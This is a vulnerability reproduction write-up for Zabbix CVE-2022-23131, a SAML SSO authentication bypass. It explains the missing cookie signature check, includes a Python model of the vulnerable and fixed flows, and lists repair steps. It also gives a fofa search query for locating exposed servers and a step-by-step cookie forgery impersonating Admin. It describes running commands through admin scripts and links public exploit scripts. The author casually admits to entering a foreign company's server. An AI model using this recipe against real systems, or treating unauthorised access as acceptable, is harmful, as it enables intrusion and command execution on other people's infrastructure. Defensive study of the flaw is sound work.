
Title: Zabbix login bypass vulnerability recurrence (CVE-2022-23131)


0x00 Introduction

Recently, while reproducing the Zabbix vulnerability (CVE-2022-23131), I accidentally got into the Zabbix server of a foreign company. Zabbix is an open source monitoring system developed by Zabbix SIA in Latvia; it supports network, server, cloud and application monitoring. The Zabbix frontend has a security vulnerability: when SAML SSO authentication (non-default) is enabled, a malicious actor can modify session data, because the user login stored in the session is not verified. An unauthenticated attacker may exploit this to escalate privileges and gain administrator access to the Zabbix frontend.

0x01 Vulnerability Cause

With SAML SSO authentication enabled (non-default), an attacker can modify session data to bypass authentication. An unauthenticated attacker may exploit this to escalate privileges and gain administrator access to the Zabbix frontend.

The vulnerability lies in the index_sso.php file: it does not call the CEncryptedCookieSession::checkSign() method to verify the cookie's signature, so a cookie supplied by the client can be forged.

Reading index_sso.php shows that when saml_data is present in the (forged) cookie, its username_attribute value is taken as the login name. If that user actually exists, a sessionid is generated for it, which bypasses authentication entirely.
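To make the missing check concrete, below is an added Python model of a signed session cookie in the zbx_session layout shown in this post (a JSON object with sessionid and sign, base64-encoded and then URL-encoded). This is example code written for this page, not Zabbix's own code: the signing scheme (HMAC-SHA256 over the JSON without the sign field, using a constructed key) and the user table are assumptions standing in for CEncryptedCookieSession and the real user lookup. It contrasts the flow that reads saml_data without calling checkSign() with the flow that verifies the signature first and therefore rejects a cookie whose saml_data was spliced in after the server signed it.

```python
import base64
import hashlib
import hmac
import json
import urllib.parse
from typing import Optional

# Constructed server-side signing key (assumption; real Zabbix manages its own key).
SESSION_KEY = b"constructed-example-session-key"

# Constructed user table standing in for the frontend's "does this user exist" lookup.
KNOWN_USERS = {"Admin", "guest"}


def sign_session(data: dict) -> str:
    """HMAC over the session data with the 'sign' field excluded (modelled, not Zabbix's exact scheme)."""
    unsigned = {k: v for k, v in data.items() if k != "sign"}
    payload = json.dumps(unsigned, sort_keys=True, separators=(",", ":")).encode()
    return base64.b64encode(hmac.new(SESSION_KEY, payload, hashlib.sha256).digest()).decode()


def encode_cookie(data: dict) -> str:
    """JSON -> base64 -> URL-encode, the same layering the decoding steps in this post undo."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    return urllib.parse.quote(base64.b64encode(raw).decode(), safe="")


def decode_cookie(cookie: str) -> dict:
    """URL-decode, then base64-decode, then parse JSON."""
    return json.loads(base64.b64decode(urllib.parse.unquote(cookie)))


def check_sign(data: dict) -> bool:
    """The verification index_sso.php skipped: recompute the signature and compare in constant time."""
    provided = data.get("sign")
    if not isinstance(provided, str):
        return False
    return hmac.compare_digest(provided, sign_session(data))


def issue_session(sessionid: str, saml_user: Optional[str] = None) -> dict:
    """Server side: build session data and sign it. saml_data is set only after a real SAML login."""
    data: dict = {"sessionid": sessionid}
    if saml_user is not None:
        data["saml_data"] = {"username_attribute": saml_user}
    data["sign"] = sign_session(data)
    return data


def tamper_cookie(cookie: str, username: str) -> str:
    """Test input: inject saml_data into an issued cookie while leaving the old sign untouched."""
    data = decode_cookie(cookie)
    return encode_cookie({"saml_data": {"username_attribute": username}, **data})


def sso_user_vulnerable(cookie: str) -> Optional[str]:
    """Vulnerable flow: trusts saml_data from the cookie without verifying the signature."""
    saml = decode_cookie(cookie).get("saml_data")
    if isinstance(saml, dict) and saml.get("username_attribute") in KNOWN_USERS:
        return saml["username_attribute"]
    return None


def sso_user_fixed(cookie: str) -> Optional[str]:
    """Fixed flow: reject the cookie unless the signature covers everything in it."""
    data = decode_cookie(cookie)
    if not check_sign(data):
        return None
    saml = data.get("saml_data")
    if isinstance(saml, dict) and saml.get("username_attribute") in KNOWN_USERS:
        return saml["username_attribute"]
    return None


# Constructed inputs: the sessionid value is the one shown in this post; the sign is computed here.
SERVER_COOKIE = encode_cookie(issue_session("171b8009284462e1dda802aac899026c"))
TAMPERED_COOKIE = tamper_cookie(SERVER_COOKIE, "Admin")
LEGIT_SAML_COOKIE = encode_cookie(issue_session("171b8009284462e1dda802aac899026c", saml_user="Admin"))

if __name__ == "__main__":
    print("vulnerable, tampered cookie:", sso_user_vulnerable(TAMPERED_COOKIE))  # Admin
    print("fixed, tampered cookie:     ", sso_user_fixed(TAMPERED_COOKIE))       # None
    print("fixed, server-signed SAML:  ", sso_user_fixed(LEGIT_SAML_COOKIE))     # Admin
```

The tampered cookie still carries the original, valid-looking sign, which is why a flow that merely checks for the field's presence is fooled; only recomputing the signature over the whole decoded object catches the spliced-in saml_data.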

0x02 Vulnerability Impact

5.4.8

5.0.18

4.0.36

0x03 Vulnerability recurrence

fofa: app='ZABBIX-Supervision System' body='saml'

Execute: curl -ksSIL http://xxx.com/


Take the value of the Set-Cookie header, URL-decode it, then base64-decode it.

After URL decoding:

eyJzZXNzaW9uaWQiOiIxNzFiODAwOTI4NDQ2MmUxZGRhODAyYWFjODk5MDI2YyIsInNpZ24iOiJ0eTZSZVkzVDRxVEdYenJseFM2ZlpyNTRhT3pCMHBhS25vWHBhZDR3MHdKc2lwNTJ2aUdndytDUlpqeVJyQUJ5WDk5bGhNMVVHbFM4cTRwNjBKb1wvUGc9PSJ9

After base64 decoding:

{"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\/Pg=="}

Then splice in the saml_data field:

{"saml_data":{"username_attribute":"Admin"},"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\/Pg=="}

After splicing, base64-encode the result.

Then URL-encode it.

Execute the command


Go to Administration -> Scripts to create a new script; here I created ifconfig.

Open Latest data under Monitoring, filter for the host group you want, and click the host name to execute the corresponding script.

Alternatively, use one of the GitHub exploit scripts: https://github.com/L0ading-x/cve-2022-23131 or https://github.com/Mr-xn/cve-2022-23131. Running the script targets Admin, the default high-privilege user, and returns its session value. Replace the zbx_session value in the cookie with that payload and click Sign in with Single Sign-On (SAML), or use EditThisCookie to replace the cookie value; the login is bypassed and you are inside the system.

0x04 Repair method

1. Disable SAML authentication

2. Upgrade to the fixed version (https://support.zabbix.com/browse/ZBX-20350)
